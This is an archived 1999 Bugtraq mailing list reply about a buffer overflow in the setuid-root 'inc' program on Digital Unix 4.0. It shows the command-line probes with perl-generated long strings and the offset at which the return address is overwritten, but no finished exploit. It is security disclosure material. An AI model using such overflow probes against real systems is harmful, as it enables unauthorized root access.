Bugtraq mailing list archives
Re: Digital Unix 4.0 exploitable buffer overflows
From: lwcashd () TROUT BIW COM (Larry W. Cashdollar)
Date: Tue, 26 Jan 1999 15:46:27 -0500
I decided to inspect this a little more on a Digital unix box I had access too. alpha>> uname -a OSF1 xxx V4.0 878 alpha alpha>> head -1 /etc/motd Digital UNIX V4.0D (Rev. 878); Tue Jul 7 08:39:27 EDT 1998 alpha>> ls -l /usr/bin/mh/inc -rws--x--x 1 root bin 73728 Dec 29 1997 /usr/bin/mh/inc* alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8169'` foo Segmentation fault alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8168'` foo Illegal instruction alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8167'` foo Segmentation fault alpha>> /usr/bin/mh/inc +foo -audit `perl -e 'print "a" x 8166'` foo inc: usage: inc [+folder] [switches] We see at 8168 a's we have overflowed the return address. If I wasnt married I could probably follow this up with the exploit. Just a little nop padding and I think it would be the perfect example of a buffer overflow exploit. -- Larry W. Cashdollar
Current thread:
- Digital Unix 4.0 exploitable buffer overflows Lamont Granquist (Jan 25)
- Re: Digital Unix 4.0 exploitable buffer overflows Seth Michael McGann (Jan 26)
- <Possible follow-ups>
- Re: Digital Unix 4.0 exploitable buffer overflows Larry W. Cashdollar (Jan 26)
- Re: Digital Unix 4.0 exploitable buffer overflows GANG WANG (Jan 27)
- UNIX shell modem access vulnerabilities Marc SCHAEFER (Jan 27)
- Re: Digital Unix 4.0 exploitable buffer overflows Lamont Granquist (Jan 28)
- Re: Digital Unix 4.0 exploitable buffer overflows FrontLine Assembly (Jan 28)
- E-mailed Trojan Mark E. Duck (Jan 28)